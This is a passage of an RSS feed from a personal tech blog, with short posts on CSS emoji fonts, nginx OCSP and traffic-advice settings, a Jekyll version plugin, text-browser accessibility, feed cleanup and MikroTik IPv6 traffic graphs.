  783. unicode-range: U+231A-231B, U+23E9-23EC, U+23F0, U+23F3, U+25FD-25FE, U+2614-2615, U+2648-2653, U+267F, U+2693, U+26A1, U+26AA-26AB, U+26BD-26BE, U+26C4-26C5, U+26CE, U+26D4, U+26EA, U+26F2-26F3, U+26F5, U+26FA, U+26FD, U+2705, U+270A-270B, U+2728, U+274C, U+274E, U+2753-2755, U+2757, U+2795-2797, U+27B0, U+27BF, U+2B1B-2B1C, U+2B50, U+2B55, U+FE0F, U+1F004, U+1F0CF, U+1F18E, U+1F191-1F19A, U+1F1E6-1F1FF, U+1F201, U+1F21A, U+1F22F, U+1F232-1F236, U+1F238-1F23A, U+1F250-1F251, U+1F300-1F320, U+1F32D-1F335, U+1F337-1F393, U+1F3A0-1F3CA, U+1F3CF-1F3D3, U+1F3E0-1F3F0, U+1F3F4, U+1F3F8-1F43E, U+1F440, U+1F442-1F4FC, U+1F4FF-1F53D, U+1F54B-1F567, U+1F57A, U+1F595-1F596, U+1F5A4, U+1F5FB-1F64F, U+1F680-1F6CC, U+1F6D0-1F6D2, U+1F6D5-1F6D7, U+1F6DC-1F6DF, U+1F6EB-1F6EC, U+1F6F4-1F6FC, U+1F7E0-1F7EB, U+1F7F0, U+1F90C-1F93A, U+1F93C-1F945, U+1F947-1FA7C, U+1FA80-1FAC5, U+1FACE-1FADB, U+1FAE0-1FAE8, U+1FAF0-1FAF8;
  784. size-adjust: 120%;
  785. }</pre>
  786. <p>By adding the custom font as first option in the <a href="" title="font-family - CSS: Cascading Style Sheets | MDN">font-family</a> directive for body text, it will be applied to the emoji and all other characters will use the existing font as fallback.</p>
  787. <pre>body {
  788.    font-family: "myemoji", Verdana, sans-serif;
  789. }</pre>
  790. <p>The outcome is nicely visible on posts such as <a href="" title="Fifty Things you can do with a Software Defined Radio 📻 - x-log">Fifty Things you can do with a Software Defined Radio 📻</a>, <a href="" title="Puppet updated! - x-log">Puppet updated!</a> and <a href="" title="The High-Risk Refactoring - x-log">The High-Risk Refactoring</a> 🍹😎</p>
  791. ]]></content:encoded>
  792.  </item>
  794.  <item>
  795.    <title>ISO 8601 and RFC3339 time format with Unix date command</title>
  796.    <link></link>
  797.    <guid isPermaLink="true"></guid>
  798.    <dc:creator>Andreas Jaggi</dc:creator>
  799.    <creativeCommons:license></creativeCommons:license>
  800.    <pubDate>Sat, 03 Aug 2024 16:41:47 +0200</pubDate>
  801.    <category domain="">Linux</category>
  802.    <description><![CDATA[<p>The following command outputs the current time formatted according to ISO 8601 and RFC3339. It can be used for example in JSON/HTML.</p>
  803. <pre>date -u '+%FT%TZ'</pre>
  804. <pre>2024-08-03T14:41:47Z</pre>
  805. ]]></description>
  806.    <content:encoded><![CDATA[<p>The following command outputs the current time formatted according to ISO 8601 and RFC3339. It can be used for example in JSON/HTML.</p>
  807. <pre>date -u '+%FT%TZ'</pre>
  808. <pre>2024-08-03T14:41:47Z</pre>
  809. ]]></content:encoded>
  810.  </item>
  812.  <item>
  813.    <title>iPhone Orientation Lock Automation</title>
  814.    <link></link>
  815.    <guid isPermaLink="true"></guid>
  816.    <dc:creator>Andreas Jaggi</dc:creator>
  817.    <creativeCommons:license></creativeCommons:license>
  818.    <pubDate>Thu, 01 Aug 2024 11:12:45 +0200</pubDate>
  819.    <category domain="">Misc</category>
  820.    <description><![CDATA[<p>Useful trick <a href="" title="iPhone Orientation Lock automatisch schalten &#8211; vowe dot net">posted by Volker Weber</a>: enable the Orientation Lock by default and use Automation Shortcuts to toggle it when Apps such as Photos or YouTube are opened/closed.<br>This allows to view pictures/videos in landscape mode while other Apps remain in portrait mode, all without having to manually toggle the Orientation Lock.</p>
  821. ]]></description>
  822.    <content:encoded><![CDATA[<p>Useful trick <a href="" title="iPhone Orientation Lock automatisch schalten &#8211; vowe dot net">posted by Volker Weber</a>: enable the Orientation Lock by default and use Automation Shortcuts to toggle it when Apps such as Photos or YouTube are opened/closed.<br>This allows to view pictures/videos in landscape mode while other Apps remain in portrait mode, all without having to manually toggle the Orientation Lock.</p>
  823. ]]></content:encoded>
  824.  </item>
  826.  <item>
  827.    <title>Puppet ERB array flatten</title>
  828.    <link></link>
  829.    <guid isPermaLink="true"></guid>
  830.    <dc:creator>Andreas Jaggi</dc:creator>
  831.    <creativeCommons:license></creativeCommons:license>
  832.    <pubDate>Wed, 31 Jul 2024 07:48:09 +0200</pubDate>
  833.    <category domain="">Linux</category>
  834.    <description><![CDATA[<p>Discovered today that <a href="" title="Arrays">Puppet arrays</a> have a built-in flatten method (which is actually provided by the underlying <a href="" title="Class: Array (Ruby 2.2.0)">Ruby array</a>).<br>This can make dealing with potentially nested arrays in ERB templates much easier.</p>
  835. <p>The following example is from the <a href="" title="Creating templates using Embedded Ruby">ERB documentation</a>:</p>
  836. <pre># Peers
  837. &lt;% [@peers].flatten.each do |peer| -%&gt;
  838. peer &lt;%= peer %&gt;
  839. &lt;% end -%&gt;</pre>
  840. <p>This allows for nice flexibility as <code>@peers</code> can now be either a single value, an array, or a nested array and all are handled in the same way without needing to write complicated if/else statements.</p>
  841. ]]></description>
  842.    <content:encoded><![CDATA[<p>Discovered today that <a href="" title="Arrays">Puppet arrays</a> have a built-in flatten method (which is actually provided by the underlying <a href="" title="Class: Array (Ruby 2.2.0)">Ruby array</a>).<br>This can make dealing with potentially nested arrays in ERB templates much easier.</p>
  843. <p>The following example is from the <a href="" title="Creating templates using Embedded Ruby">ERB documentation</a>:</p>
  844. <pre># Peers
  845. &lt;% [@peers].flatten.each do |peer| -%&gt;
  846. peer &lt;%= peer %&gt;
  847. &lt;% end -%&gt;</pre>
  848. <p>This allows for nice flexibility as <code>@peers</code> can now be either a single value, an array, or a nested array and all are handled in the same way without needing to write complicated if/else statements.</p>
  849. ]]></content:encoded>
  850.  </item>
  852.  <item>
  853.    <title>No more OSCP stapling</title>
  854.    <link></link>
  855.    <guid isPermaLink="true"></guid>
  856.    <dc:creator>Andreas Jaggi</dc:creator>
  857.    <creativeCommons:license></creativeCommons:license>
  858.    <pubDate>Thu, 25 Jul 2024 08:42:00 +0200</pubDate>
  859.    <category domain="">Linux</category>
  860.    <description><![CDATA[<p><a href="" title="Intent to End OCSP Service -  Let's Encrypt">Let's Encrypt announced</a> that it intends to stop supporting <a href="" title="Online Certificate Status Protocol - Wikipedia">OCSP</a>, which means that <a href="" title="Chris's Wiki :: blog/web/OCSPIsBasicallyDead">OCSP is basically dead now</a>.</p>
  861. <p><a href="" title="OCSP stapling - Wikipedia">OCSP stapling</a> on my server has been enabled since 2012.<br>With the prospect of it no longer working in the future, I've disabled it again in the nginx configuration.</p>
  862. <pre> # aj, 05.11.2012, OCSP stapling (for testing see
  863.        # aj, 25.07.2024, turn it off again, as letsencrypt will disable it:
  864. # ssl_stapling on;</pre>
  865. ]]></description>
  866.    <content:encoded><![CDATA[<p><a href="" title="Intent to End OCSP Service -  Let's Encrypt">Let's Encrypt announced</a> that it intends to stop supporting <a href="" title="Online Certificate Status Protocol - Wikipedia">OCSP</a>, which means that <a href="" title="Chris's Wiki :: blog/web/OCSPIsBasicallyDead">OCSP is basically dead now</a>.</p>
  867. <p><a href="" title="OCSP stapling - Wikipedia">OCSP stapling</a> on my server has been enabled since 2012.<br>With the prospect of it no longer working in the future, I've disabled it again in the nginx configuration.</p>
  868. <pre> # aj, 05.11.2012, OCSP stapling (for testing see
  869.        # aj, 25.07.2024, turn it off again, as letsencrypt will disable it:
  870. # ssl_stapling on;</pre>
  871. ]]></content:encoded>
  872.  </item>
  874.  <item>
  875.    <title>Blog Directories</title>
  876.    <link></link>
  877.    <guid isPermaLink="true"></guid>
  878.    <dc:creator>Andreas Jaggi</dc:creator>
  879.    <creativeCommons:license></creativeCommons:license>
  880.    <pubDate>Wed, 24 Jul 2024 19:52:00 +0200</pubDate>
  881.    <category domain="">Misc</category>
  882.    <description><![CDATA[<p>There are some new blog directory sites popping up again. Nice way to discover niche personal sites outside of the big platforms.</p>
  883. <ul>
  884. <li><a href="" title=" a place to find good blogs that interest you"></a></li>
  885. <li><a href="" title=" | Yes we got hot and fresh sites"></a></li>
  886. <li><a href="" title="Ye Olde Blogroll -"></a></li>
  887. </ul>
  888. ]]></description>
  889.    <content:encoded><![CDATA[<p>There are some new blog directory sites popping up again. Nice way to discover niche personal sites outside of the big platforms.</p>
  890. <ul>
  891. <li><a href="" title=" a place to find good blogs that interest you"></a></li>
  892. <li><a href="" title=" | Yes we got hot and fresh sites"></a></li>
  893. <li><a href="" title="Ye Olde Blogroll -"></a></li>
  894. </ul>
  895. ]]></content:encoded>
  896.  </item>
  898.  <item>
  899.    <title>Less: a Survival Guide</title>
  900.    <link></link>
  901.    <guid isPermaLink="true"></guid>
  902.    <dc:creator>Andreas Jaggi</dc:creator>
  903.    <creativeCommons:license></creativeCommons:license>
  904.    <pubDate>Mon, 22 Jul 2024 05:06:00 +0200</pubDate>
  905.    <category domain="">Linux</category>
  906.    <description><![CDATA[<p><a href="" title="Less: a Survival Guide">Less: a Survival Guide</a> is a concise post from <a href="" title=""></a> demystifying the features of <code>less</code>.</p>
  907. <p>My two main takeaways were:</p>
  908. <p>1. Configuring less via the <code>LESS</code> environment variable.<br>The following enables markers and highlighting for search &amp; jump actions, colored output and raw display of terminal escape sequences.</p>
  909. <pre>export LESS="-J -W --use-color -R"</pre>
  910. <p>2. Jumping to the start and end of a document with <kbd>g</kbd> and <kbd>G</kbd>.<br>I already used <kbd>/</kbd> for searching, but had always struggled to go back to the beginning of a document.</p>
  911. ]]></description>
  912.    <content:encoded><![CDATA[<p><a href="" title="Less: a Survival Guide">Less: a Survival Guide</a> is a concise post from <a href="" title=""></a> demystifying the features of <code>less</code>.</p>
  913. <p>My two main takeaways were:</p>
  914. <p>1. Configuring less via the <code>LESS</code> environment variable.<br>The following enables markers and highlighting for search &amp; jump actions, colored output and raw display of terminal escape sequences.</p>
  915. <pre>export LESS="-J -W --use-color -R"</pre>
  916. <p>2. Jumping to the start and end of a document with <kbd>g</kbd> and <kbd>G</kbd>.<br>I already used <kbd>/</kbd> for searching, but had always struggled to go back to the beginning of a document.</p>
  917. ]]></content:encoded>
  918.  </item>
  920.  <item>
  921.    <title>Lego Space Age</title>
  922.    <link></link>
  923.    <guid isPermaLink="true"></guid>
  924.    <dc:creator>Andreas Jaggi</dc:creator>
  925.    <creativeCommons:license></creativeCommons:license>
  926.    <pubDate>Sun, 07 Jul 2024 16:43:00 +0200</pubDate>
  927.    <category domain="">Webdesign</category>
  928.    <description><![CDATA[<p><a href="" title="Lego Space Age"><img src="" width="500" height="375" alt="Lego Space Age"></a></p>
  930. <p>While browsing for something unrelated, I came about this wonderful Lego set called <a href="" title="Tales of the Space Age 21340 | Ideas">'Tales of the Space Age'</a>.<br>
  931. It was originally created by a fan designer through the Lego Ideas program and turned into this amazing looking Lego set.</p>
  933. <p>I like the depiction of the space themed science fiction worlds very much, especially the beautiful color gradients giving each world a unique atmosphere.<br>
  934. The provided <a href="" title="Building Instructions">building instructions</a> <a href="" title="Postcards from space - Building Instructions">booklet</a> builds on top of this with illustrations enhancing the views of these worlds.</p>
  936. <p>Looking at these four panels with the nice space themed color gradients inspired me to rebuild them in CSS.<br>
  937. First I toyed around with one and then built the other three.</p>
  939. <p>The outcome of this is now visible on <a href="" title=""></a> where I replaced the previous entry page with the four color gradients.<br>
  940. The <a href="" title="More modern technologies - x-log">previous version</a> is still available on <a href="" title=""></a> as I couldn't decide yet to retire it, so will be keeping both for now :-)</p>
  941. ]]></description>
  942.    <content:encoded><![CDATA[<p><a href="" title="Lego Space Age"><img src="" width="500" height="375" alt="Lego Space Age"></a></p>
  944. <p>While browsing for something unrelated, I came about this wonderful Lego set called <a href="" title="Tales of the Space Age 21340 | Ideas">'Tales of the Space Age'</a>.<br>
  945. It was originally created by a fan designer through the Lego Ideas program and turned into this amazing looking Lego set.</p>
  947. <p>I like the depiction of the space themed science fiction worlds very much, especially the beautiful color gradients giving each world a unique atmosphere.<br>
  948. The provided <a href="" title="Building Instructions">building instructions</a> <a href="" title="Postcards from space - Building Instructions">booklet</a> builds on top of this with illustrations enhancing the views of these worlds.</p>
  950. <p>Looking at these four panels with the nice space themed color gradients inspired me to rebuild them in CSS.<br>
  951. First I toyed around with one and then built the other three.</p>
  953. <p>The outcome of this is now visible on <a href="" title=""></a> where I replaced the previous entry page with the four color gradients.<br>
  954. The <a href="" title="More modern technologies - x-log">previous version</a> is still available on <a href="" title=""></a> as I couldn't decide yet to retire it, so will be keeping both for now :-)</p>
  955. ]]></content:encoded>
  956.  </item>
  958.  <item>
  959.    <title>Jekyll version plugin</title>
  960.    <link></link>
  961.    <guid isPermaLink="true"></guid>
  962.    <dc:creator>Andreas Jaggi</dc:creator>
  963.    <creativeCommons:license></creativeCommons:license>
  964.    <pubDate>Sat, 06 Jul 2024 18:47:00 +0200</pubDate>
  965.    <category domain="">Coding</category>
  966.    <description><![CDATA[<p>Recently I added a Generator section to the <a href="" title="x-log - About">about page</a> with minimal information about how this page was generated.<br>As part of this it now also shows the version of the <a href="" title="Jekyll • Simple, blog-aware, static sites | Transform your plain text into static websites and blogs">Jekyll</a> software that was used to generate everything.</p>
  967. <p>Surprisingly there seems to be no built-in way to get the version as a template tag.<br>Thus I wrote this mini-plugin to provide such a <code>{% jekyll_version %}</code> tag that can be used to get the version of Jekyll while it is processing the pages.</p>
  968. <p>To use it with your own Jekyll, simply store the below code in a <code>_plugins/jekyll_version_plugin.rb</code> file.</p>
  969. <pre># frozen_string_literal: true
  970. module Jekyll
  971.  class VersionTag &lt; Liquid::Tag
  972.    def render(context)
  973.      Jekyll::VERSION
  974.    end
  975.  end
  976. end
  978. Liquid::Template.register_tag("jekyll_version", Jekyll::VersionTag)</pre>
  979. ]]></description>
  980.    <content:encoded><![CDATA[<p>Recently I added a Generator section to the <a href="" title="x-log - About">about page</a> with minimal information about how this page was generated.<br>As part of this it now also shows the version of the <a href="" title="Jekyll • Simple, blog-aware, static sites | Transform your plain text into static websites and blogs">Jekyll</a> software that was used to generate everything.</p>
  981. <p>Surprisingly there seems to be no built-in way to get the version as a template tag.<br>Thus I wrote this mini-plugin to provide such a <code>{% jekyll_version %}</code> tag that can be used to get the version of Jekyll while it is processing the pages.</p>
  982. <p>To use it with your own Jekyll, simply store the below code in a <code>_plugins/jekyll_version_plugin.rb</code> file.</p>
  983. <pre># frozen_string_literal: true
  984. module Jekyll
  985.  class VersionTag &lt; Liquid::Tag
  986.    def render(context)
  987.      Jekyll::VERSION
  988.    end
  989.  end
  990. end
  992. Liquid::Template.register_tag("jekyll_version", Jekyll::VersionTag)</pre>
  993. ]]></content:encoded>
  994.  </item>
  996.  <item>
  997.    <title>More statistics tuning</title>
  998.    <link></link>
  999.    <guid isPermaLink="true"></guid>
  1000.    <dc:creator>Andreas Jaggi</dc:creator>
  1001.    <creativeCommons:license></creativeCommons:license>
  1002.    <pubDate>Sat, 06 Jul 2024 18:10:00 +0200</pubDate>
  1003.    <category domain="">Webdesign</category>
  1004.    <description><![CDATA[<p>After <a href="" title="Improved text-only UX">last weeks work</a> on the <a href="" title="x-log - Statistics">statistics page</a>, I was still not completely happy with how it renders in text-only browsers.</p>
  1005. <p>Thus the idea of adding <code>&lt;th&gt;</code> headers to the two rows of numbers.<br>This turned out quite well and helped to make things more clear as you can see in this screenshot.</p>
  1006. <p><img src="" alt="Screenshot of Lynx rendering the improved statistics page" width="720" height="423"></p>
  1007. <p>I initially wanted to use the <code>:first-child</code> selector to hide these additional table headers in graphical web browsers.<br>But didn't get it right with the first try, so the header still showed.</p>
  1008. <p>This actually didn't look that bad, and so I decided to keep the headers visible and styled them nicely so they integrate well with the rest of the statistics table.<br>This is how the <a href="" title="x-log - Statistics">statistics page</a> now looks in a graphical web browser.</p>
  1009. <p><img src="" alt="Screenshot of Firefox rendering the improved statistics page" width="720" height="465"></p>
  1010. ]]></description>
  1011.    <content:encoded><![CDATA[<p>After <a href="" title="Improved text-only UX">last weeks work</a> on the <a href="" title="x-log - Statistics">statistics page</a>, I was still not completely happy with how it renders in text-only browsers.</p>
  1012. <p>Thus the idea of adding <code>&lt;th&gt;</code> headers to the two rows of numbers.<br>This turned out quite well and helped to make things more clear as you can see in this screenshot.</p>
  1013. <p><img src="" alt="Screenshot of Lynx rendering the improved statistics page" width="720" height="423"></p>
  1014. <p>I initially wanted to use the <code>:first-child</code> selector to hide these additional table headers in graphical web browsers.<br>But didn't get it right with the first try, so the header still showed.</p>
  1015. <p>This actually didn't look that bad, and so I decided to keep the headers visible and styled them nicely so they integrate well with the rest of the statistics table.<br>This is how the <a href="" title="x-log - Statistics">statistics page</a> now looks in a graphical web browser.</p>
  1016. <p><img src="" alt="Screenshot of Firefox rendering the improved statistics page" width="720" height="465"></p>
  1017. ]]></content:encoded>
  1018.  </item>
  1020.  <item>
  1021.    <title>Improved text-only UX</title>
  1022.    <link></link>
  1023.    <guid isPermaLink="true"></guid>
  1024.    <dc:creator>Andreas Jaggi</dc:creator>
  1025.    <creativeCommons:license></creativeCommons:license>
  1026.    <pubDate>Sun, 30 Jun 2024 21:37:00 +0200</pubDate>
  1027.    <category domain="">Webdesign</category>
  1028.    <description><![CDATA[<p>Some time ago I read <a href="" title="Test your site in Lynx – Dan Q">this article from Dan Q</a> about testing your website in a text-only browser (<a href="" title="Lynx (web browser) - Wikipedia">Lynx</a>, which is the oldest web browser still being maintained, started in 1992).</p>
  1029. <p>Surfing through my blog with Lynx, I was positively surprised in how well the content and structure was presented.<br>Seems like the modernization and simplification efforts of the HTML code behind the scenes paid off well.</p>
  1030. <p>The <a href="" title="x-log - Statistics">statistics page</a> though was not really usable, it was displayed as a random soup of numbers due to the usage of unstructured <code>&lt;div&gt;</code> tags for the elements of the visual graphs.</p>
  1031. <p>To fix this I reverted back to using <code>&lt;table&gt;</code> tags to structure the data.<br>This way the layout degrades gracefully in text-only browsers and provides a minimally structured representation of the data.<br>And I applied <a href="" title="More modern technologies - x-log">the newly learned CSS skills</a> (<code>linear-gradient</code> backgrounds) to achieve the same visual graph as beforehand when opening the page in a regular browser.</p>
  1032. <p><img src="" alt="Screenshot of Lynx rendering the statistics page" width="720" height="423"></p>
  1033. ]]></description>
  1034.    <content:encoded><![CDATA[<p>Some time ago I read <a href="" title="Test your site in Lynx – Dan Q">this article from Dan Q</a> about testing your website in a text-only browser (<a href="" title="Lynx (web browser) - Wikipedia">Lynx</a>, which is the oldest web browser still being maintained, started in 1992).</p>
  1035. <p>Surfing through my blog with Lynx, I was positively surprised in how well the content and structure was presented.<br>Seems like the modernization and simplification efforts of the HTML code behind the scenes paid off well.</p>
  1036. <p>The <a href="" title="x-log - Statistics">statistics page</a> though was not really usable, it was displayed as a random soup of numbers due to the usage of unstructured <code>&lt;div&gt;</code> tags for the elements of the visual graphs.</p>
  1037. <p>To fix this I reverted back to using <code>&lt;table&gt;</code> tags to structure the data.<br>This way the layout degrades gracefully in text-only browsers and provides a minimally structured representation of the data.<br>And I applied <a href="" title="More modern technologies - x-log">the newly learned CSS skills</a> (<code>linear-gradient</code> backgrounds) to achieve the same visual graph as beforehand when opening the page in a regular browser.</p>
  1038. <p><img src="" alt="Screenshot of Lynx rendering the statistics page" width="720" height="423"></p>
  1039. ]]></content:encoded>
  1040.  </item>
  1042.  <item>
  1043.    <title>.well-known/traffic-advice</title>
  1044.    <link></link>
  1045.    <guid isPermaLink="true"></guid>
  1046.    <dc:creator>Andreas Jaggi</dc:creator>
  1047.    <creativeCommons:license></creativeCommons:license>
  1048.    <pubDate>Sat, 29 Jun 2024 09:48:00 +0200</pubDate>
  1049.    <category domain="">Webdesign</category>
  1050.    <description><![CDATA[<p>While looking at my 404s the top one for the blog was <code>/.well-known/traffic-advice</code>.<br>
  1051. This is part of the traffic advice mechanism to control traffic from prefetch proxies (and based on my current access logs, seems only used by the <a href="" title="Private prefetch proxy in Chrome">Chrome Privacy Preserving Prefetch Proxy</a>).</p>
  1052. <p>The traffic advice mechanism is specified in the document <a href="" title="Traffic Advice">here</a>.<br>
  1053. It can be used to reduce the number of requests coming from prefetch proxies.</p>
  1054. <p>To get rid of the 404s and provide support for the traffic advice mechanism, I use the following snippet in my nginx config.<br>
  1055. It allows all requests from prefetch proxies (as currently I see no need to limit them).</p>
  1056. <pre># Private Prefetch Proxy
  1057. #
  1058. location /.well-known/traffic-advice {
  1059.        types { } default_type "application/trafficadvice+json";
  1060.        return 200 '[{"user_agent":"prefetch-proxy","fraction":1.0}]';
  1061. }</pre>
  1062. ]]></description>
  1063.    <content:encoded><![CDATA[<p>While looking at my 404s the top one for the blog was <code>/.well-known/traffic-advice</code>.<br>
  1064. This is part of the traffic advice mechanism to control traffic from prefetch proxies (and based on my current access logs, seems only used by the <a href="" title="Private prefetch proxy in Chrome">Chrome Privacy Preserving Prefetch Proxy</a>).</p>
  1065. <p>The traffic advice mechanism is specified in the document <a href="" title="Traffic Advice">here</a>.<br>
  1066. It can be used to reduce the number of requests coming from prefetch proxies.</p>
  1067. <p>To get rid of the 404s and provide support for the traffic advice mechanism, I use the following snippet in my nginx config.<br>
  1068. It allows all requests from prefetch proxies (as currently I see no need to limit them).</p>
  1069. <pre># Private Prefetch Proxy
  1070. #
  1071. location /.well-known/traffic-advice {
  1072.        types { } default_type "application/trafficadvice+json";
  1073.        return 200 '[{"user_agent":"prefetch-proxy","fraction":1.0}]';
  1074. }</pre>
  1075. ]]></content:encoded>
  1076.  </item>
  1078.  <item>
  1079.    <title>RSS feed tuning</title>
  1080.    <link></link>
  1081.    <guid isPermaLink="true"></guid>
  1082.    <dc:creator>Andreas Jaggi</dc:creator>
  1083.    <creativeCommons:license></creativeCommons:license>
  1084.    <pubDate>Sun, 23 Jun 2024 16:44:00 +0200</pubDate>
  1085.    <category domain="">Webdesign</category>
  1086.    <description><![CDATA[<p>After the <a href="" title="Jumping on the Web Components bandwagon - x-log">recent addition of custom Web Components</a>, the usual <a href="" title="RSS Validator">feed</a> <a href="" title="W3C Feed Validation Service, for Atom and RSS">validators</a> were a bit less happy about my <a href="">RSS</a> and <a href="">Atom</a> feeds.</p>
  1087. <p>They always marked my feeds as valid, but usually had some recommendations to improve interoperability with the widest range of feed readers.<br>In particular having non-HTML5 elements does not help with interoperability. Which makes sense as there is no real place in the XML of the feeds to reference the needed JavaScript for rendering the Web Components.</p>
  1088. <p>Besides stripping away the &lt;youtube-vimeo-embed&gt; tags and replacing them with a link to the video, I took this opportunity to cleanup some other 'Altlasten' (legacy tech depts).<br>A lot of time was spent trying to get my head around various encodings/escapings of special characters. When the blog started in 2002, UTF-8 was not adopted yet and all special characters needed to be written as <a href="" title="Character reference - MDN">HTML entities</a>.<br>And what didn't help is that I somehow had a text-only part in my RSS file which tried to deliver a version of my posts without any HTML (but failed to do so properly as it only had the tags stripped away but did not revert all the HTML character encodings.<br>Of course the various resulting &amp; characters nicely clash with XML encoding).</p>
  1089. <p>There were some other oddities from the past, such as empty post titles and HTML tags inside titles.</p>
  1090. <p>I ended up cleaning up most of this and got rid of the text-only representation and corresponding encoding/escaping problems. (using <code>&lt;![CDATA[</code> and <code>]]&gt;</code> with the HTML content inside makes life so much easier)</p>
  1091. <p>The still remaing recommendations to improve are about relative links and <code>&lt;script&gt;</code> tags.<br>The relative links are all due to my replacing of dead and non-archived link destinations with a single <code>#</code>. So they are more a 'false postive' than a real problem, the links are dead either way.<br>The <code>&lt;script&gt;</code> tags are more problematic, as they result from my embedding of <a href="" title="Discover Discover gists · GitHub">GitHub Gists</a> in posts. The code in the Gists is loaded, rendered and nicely highlighted with color by the script, thus not easy to replicate in a feed.</p>
  1092. <p>Probably the best approach for the Gists would be to find a way to properly include the content into the posts. So that it is rendered nicely when viewed in a browser, and has a meaningful text-only fallback in the feeds.<br>Would make sense to self-hosts these anyways. Next rainy weekend project there you are :-)</p>
  1093. <p><a href="" title="RSS Validator Results:"><img src="" width="88" height="31" alt="This is a valid RSS feed."></a> <a href="" title="Feed Validator Results:"><img src="" width="88" height="31" alt="This is a valid Atom 1.0 feed."></a></p>
  1094. ]]></description>
  1095.    <content:encoded><![CDATA[<p>After the <a href="" title="Jumping on the Web Components bandwagon - x-log">recent addition of custom Web Components</a>, the usual <a href="" title="RSS Validator">feed</a> <a href="" title="W3C Feed Validation Service, for Atom and RSS">validators</a> were a bit less happy about my <a href="">RSS</a> and <a href="">Atom</a> feeds.</p>
  1096. <p>They always marked my feeds as valid, but usually had some recommendations to improve interoperability with the widest range of feed readers.<br>In particular having non-HTML5 elements does not help with interoperability. Which makes sense as there is no real place in the XML of the feeds to reference the needed JavaScript for rendering the Web Components.</p>
  1097. <p>Besides stripping away the &lt;youtube-vimeo-embed&gt; tags and replacing them with a link to the video, I took this opportunity to cleanup some other 'Altlasten' (legacy tech depts).<br>A lot of time was spent trying to get my head around various encodings/escapings of special characters. When the blog started in 2002, UTF-8 was not adopted yet and all special characters needed to be written as <a href="" title="Character reference - MDN">HTML entities</a>.<br>And what didn't help is that I somehow had a text-only part in my RSS file which tried to deliver a version of my posts without any HTML (but failed to do so properly as it only had the tags stripped away but did not revert all the HTML character encodings.<br>Of course the various resulting &amp; characters nicely clash with XML encoding).</p>
  1098. <p>There were some other oddities from the past, such as empty post titles and HTML tags inside titles.</p>
  1099. <p>I ended up cleaning up most of this and got rid of the text-only representation and corresponding encoding/escaping problems. (using <code>&lt;![CDATA[</code> and <code>]]&gt;</code> with the HTML content inside makes life so much easier)</p>
  1100. <p>The still remaing recommendations to improve are about relative links and <code>&lt;script&gt;</code> tags.<br>The relative links are all due to my replacing of dead and non-archived link destinations with a single <code>#</code>. So they are more a 'false postive' than a real problem, the links are dead either way.<br>The <code>&lt;script&gt;</code> tags are more problematic, as they result from my embedding of <a href="" title="Discover Discover gists · GitHub">GitHub Gists</a> in posts. The code in the Gists is loaded, rendered and nicely highlighted with color by the script, thus not easy to replicate in a feed.</p>
  1101. <p>Probably the best approach for the Gists would be to find a way to properly include the content into the posts. So that it is rendered nicely when viewed in a browser, and has a meaningful text-only fallback in the feeds.<br>Would make sense to self-hosts these anyways. Next rainy weekend project there you are :-)</p>
  1102. <p><a href="" title="RSS Validator Results:"><img src="" width="88" height="31" alt="This is a valid RSS feed."></a> <a href="" title="Feed Validator Results:"><img src="" width="88" height="31" alt="This is a valid Atom 1.0 feed."></a></p>
  1103. ]]></content:encoded>
  1104.  </item>
  1106.  <item>
  1107.    <title>sibatable</title>
  1108.    <link></link>
  1109.    <guid isPermaLink="true"></guid>
  1110.    <dc:creator>Andreas Jaggi</dc:creator>
  1111.    <creativeCommons:license></creativeCommons:license>
  1112.    <pubDate>Sat, 22 Jun 2024 20:06:00 +0200</pubDate>
  1113.    <category domain="">Food</category>
  1114.    <description><![CDATA[<p><a href="" title="sibatable"><img src="" width="446" height="431" alt="A bowl of ramen with the rice and eggs decorated so that they look like a chicken with her chicks."></a></p>
  1115. <p>Amazing food art by <a href="" title="시바테이블 (&#064;sibatable) • Instagram">sibatable</a>.</p>
  1116. <p>Besides the <a href="" title="시바테이블 (&#064;sibatable) • Instagram">Instagram page</a> and the <a href="" title="sibatable님의 공간에 오신 것을 환영합니다."> page</a> check out the articles from <a href="" title="Sibatable, the aestheticisation of food through fantasy - Tapas">Tapas</a> and <a href="" title="Super Cute Animal Food Art by Korean Artist">My Modern Met</a> for more infos about the artist.</p>
  1117. <p>(<a href="" title="Weekend Reading — Occam&#x27;s shaving kit —  Labnotes (by Assaf Arkin)">via</a>)</p>
  1118. ]]></description>
  1119.    <content:encoded><![CDATA[<p><a href="" title="sibatable"><img src="" width="446" height="431" alt="A bowl of ramen with the rice and eggs decorated so that they look like a chicken with her chicks."></a></p>
  1120. <p>Amazing food art by <a href="" title="시바테이블 (&#064;sibatable) • Instagram">sibatable</a>.</p>
  1121. <p>Besides the <a href="" title="시바테이블 (&#064;sibatable) • Instagram">Instagram page</a> and the <a href="" title="sibatable님의 공간에 오신 것을 환영합니다."> page</a> check out the articles from <a href="" title="Sibatable, the aestheticisation of food through fantasy - Tapas">Tapas</a> and <a href="" title="Super Cute Animal Food Art by Korean Artist">My Modern Met</a> for more infos about the artist.</p>
  1122. <p>(<a href="" title="Weekend Reading — Occam&#x27;s shaving kit —  Labnotes (by Assaf Arkin)">via</a>)</p>
  1123. ]]></content:encoded>
  1124.  </item>
  1126.  <item>
  1127.    <title>IPv6 vs IPv4 traffic graphs in MikroTik</title>
  1128.    <link></link>
  1129.    <guid isPermaLink="true"></guid>
  1130.    <dc:creator>Andreas Jaggi</dc:creator>
  1131.    <creativeCommons:license></creativeCommons:license>
  1132.    <pubDate>Sat, 22 Jun 2024 12:32:00 +0200</pubDate>
  1133.    <category domain="">Networking</category>
  1134.    <description><![CDATA[<p>Out of curiosity I wanted to know how much of my Internet traffic uses IPv6 vs the <a href="">legacy IPv4</a>.</p>
  1135. <p>There is no out-of-the-box graph for this in MikroTik.<br>Several forum and Stack Overflow posts suggest using ratelimiting queues with their graphing feature to collect this data.<p>
  1136. <p>After experimenting a bit, I ended up with the following configuration which creates two queues to collect the traffic data.<br>Important to know, traffic flows on a first-match basis through the queues. Thus the trick of having first the queue matching IPv6 traffic and then the queue matching all the remaining traffic.<br>Also, I use <code>10G</code> as 'unreachable' traffic limit to avoid any traffic being ratelimited. This works well for my 1Gbit/s setup, but will need to be adjusted if you have a higher bandwidth.</p>
  1137. <pre>/queue simple add limit-at=10G/10G max-limit=10G/10G name=v6-traffic queue=ethernet-default/ethernet-default target=2000::/3 total-queue=ethernet-default
  1138. /queue simple add limit-at=10G/10G max-limit=10G/10G name=v4-traffic queue=ethernet-default/ethernet-default target="" total-queue=ethernet-default</pre>
  1139. <p>Having the queues in place for a couple days results in the following graphs:</p>
